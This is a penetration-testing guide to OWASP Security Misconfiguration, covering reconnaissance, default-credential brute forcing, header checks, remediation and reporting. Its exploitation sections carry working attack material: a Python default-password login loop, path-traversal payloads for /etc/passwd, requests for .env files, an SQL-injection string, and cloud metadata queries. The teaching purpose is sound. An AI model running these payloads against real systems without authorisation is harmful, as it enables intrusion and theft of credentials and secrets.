OWASP A05:2021 - Security Misconfiguration

Overview

Security Misconfiguration occurs when security settings are defined, implemented, or maintained incorrectly. This vulnerability encompasses a wide range of configuration issues across the entire application stack, from the operating system to custom application code.

Risk Rating

• Prevalence: Common

• Detectability: Easy to Average

• Impact: Moderate to Severe

• CVSS Score Range: 4.0-7.5 (depending on specific misconfiguration)

Common Scenarios

1. Default Configurations

• Unchanged default passwords for databases, application servers, admin interfaces

• Default accounts left enabled (admin/admin, root/root, etc.)

• Sample applications not removed from production servers

• Default error pages revealing server information

2. Incomplete or Improper Configurations

• Directory listings enabled on web servers

• Unnecessary services running (FTP, SSH, Telnet on web servers)

• Debug mode enabled in production

• Verbose error messages exposing stack traces and system information

3. Missing Security Headers

• X-Frame-Options missing (clickjacking protection)

• Content-Security-Policy not implemented

• X-Content-Type-Options missing

• Strict-Transport-Security not configured

4. Outdated Software Components

• Unpatched operating systems and applications

• End-of-life software still in use

• Unnecessary features enabled in frameworks

Penetration Testing Methodology

1. Information Gathering

# Nmap service and version detection
nmap -sV -sC -p- target.com

# Nikto web vulnerability scanner
nikto -h http://target.com

# Directory enumeration
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Technology stack identification
whatweb http://target.com

2. Configuration Analysis

# Check for common admin panels
gobuster dir -u http://target.com -w admin-panels.txt

# Test for default credentials
hydra -L default-usernames.txt -P default-passwords.txt target.com http-post-form

# SSL/TLS configuration testing
sslscan target.com
testssl.sh target.com

3. HTTP Security Headers Testing

# Manual header inspection
curl -I http://target.com

# Automated security header testing
python3 shcheck.py http://target.com

4. Server Configuration Testing

# HTTP methods testing
curl -X OPTIONS http://target.com -v
curl -X TRACE http://target.com -v
curl -X PUT http://target.com/test.txt -d "test content" -v

# Server information disclosure
curl -s -I http://target.com | grep -i server

Common Misconfigurations by Technology

Web Servers

Apache

• .htaccess files not properly secured

• ServerTokens set to Full

• Directory indexing enabled

• Unnecessary modules loaded

Nginx

• server_tokens enabled

• Autoindex on

• Missing security headers in configuration

IIS

• Default error pages revealing version information

• Unnecessary HTTP verbs enabled

• Directory browsing enabled

Databases

MySQL

• Root account without password

• Remote root login enabled

• Test database present

• Unnecessary user accounts

MongoDB

• No authentication configured

• Binding to 0.0.0.0

• Default port exposure

Application Frameworks

Spring Boot

• Actuator endpoints exposed without authentication

• Debug mode in production

• Default error handling revealing stack traces

Django

• DEBUG = True in production

• Secret key exposure

• ALLOWED_HOSTS misconfiguration

Detection Techniques

1. Automated Scanning

# OpenVAS vulnerability scanner
openvas-cli -h target.com

# Nuclei templates for misconfigurations
nuclei -u http://target.com -t misconfigurations/

# Custom Nmap scripts
nmap --script vuln target.com

2. Manual Testing Checklist

Server Information

• Server version disclosure in headers

• Error pages revealing system information

• Default installation pages accessible

• Sample applications present

Access Controls

• Admin interfaces accessible without authentication

• Default credentials accepted

• Unnecessary user accounts present

• Privilege escalation possible

Network Security

• Unnecessary ports open

• Services running with excessive privileges

• Firewall misconfigurations

• Internal network exposure

3. Security Headers Assessment

# Missing security headers to check for:
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: default-src 'self'
Referrer-Policy: strict-origin-when-cross-origin

Exploitation Examples

1. Directory Traversal via Misconfigured Web Server

# Test for directory listing
curl http://target.com/admin/
curl http://target.com/backup/
curl http://target.com/config/

# Access sensitive files
curl http://target.com/config/database.conf
curl http://target.com/.env

2. Admin Panel with Default Credentials

import requests

target = "http://target.com/admin"
credentials = [
    ("admin", "admin"),
    ("administrator", "password"),
    ("root", "root"),
    ("admin", "123456")
]

for username, password in credentials:
    response = requests.post(target, data={
        "username": username,
        "password": password
    })
    if "dashboard" in response.text.lower():
        print(f"Success: {username}:{password}")

3. Information Disclosure via Error Messages

# Trigger error conditions
curl "http://target.com/nonexistent" -v
curl "http://target.com/api/users/'; DROP TABLE users; --" -v

Remediation Guidelines

1. Secure Configuration Management

• Implement infrastructure as code

• Use configuration management tools (Ansible, Chef, Puppet)

• Regular configuration audits

• Secure defaults for all configurations

2. Hardening Checklist

• Remove or disable unnecessary features and services

• Change all default passwords and accounts

• Implement least privilege principle

• Regular security updates and patches

3. Security Headers Implementation

# Apache .htaccess example
Header always set X-Frame-Options "DENY"
Header always set X-Content-Type-Options "nosniff"
Header always set X-XSS-Protection "1; mode=block"
Header always set Strict-Transport-Security "max-age=31536000"
Header always set Content-Security-Policy "default-src 'self'"

4. Error Handling

• Implement custom error pages

• Log errors securely without exposing sensitive information

• Disable detailed error messages in production

Tools and Resources

Automated Scanners

• OpenVAS - Comprehensive vulnerability scanner

• Nessus - Commercial vulnerability scanner

• Nuclei - Fast vulnerability scanner with templates

• Nikto - Web server scanner

Configuration Auditing

• Lynis - System and configuration auditing

• CIS-CAT - CIS benchmark assessment

• Security Monkey - AWS configuration monitoring

• Scout Suite - Cloud security auditing

Custom Scripts

• testssl.sh - SSL/TLS configuration testing

• SSLyze - SSL configuration analyzer

• securityheaders.com - Online security headers checker

Reporting Template

Finding Description

Title: Security Misconfiguration - [Specific Issue]
Severity: [High/Medium/Low]
CVSS Score: [X.X]

Description:
The application/server contains a security misconfiguration that could allow an attacker to [impact description].

Evidence:
[Screenshots, command outputs, proof of concept]

Impact:
[Detailed explanation of potential impact]

Recommendation:
[Specific remediation steps]

Common Bypasses and Advanced Techniques

1. WAF Bypass for Configuration Discovery

# Using different encodings
curl "http://target.com/%2e%2e/%2e%2e/etc/passwd"
curl "http://target.com/..%2f..%2fetc%2fpasswd"

# Using different HTTP methods
curl -X POST "http://target.com/admin" -d "test=1"

2. Cloud Metadata Service Access

# AWS metadata
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/user-data/

# Azure metadata
curl -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2017-04-02"

Prevention Best Practices

1. Configuration Management: Use version-controlled, automated configuration management

2. Regular Audits: Implement regular security configuration reviews

3. Principle of Least Privilege: Configure services with minimal necessary permissions

4. Defense in Depth: Implement multiple layers of security controls

5. Continuous Monitoring: Monitor for configuration changes and drift

References and Further Reading

• OWASP Security Misconfiguration Guide

• CIS Benchmarks for various technologies

• NIST Cybersecurity Framework

• Cloud provider security best practices guides

• Vendor-specific hardening guides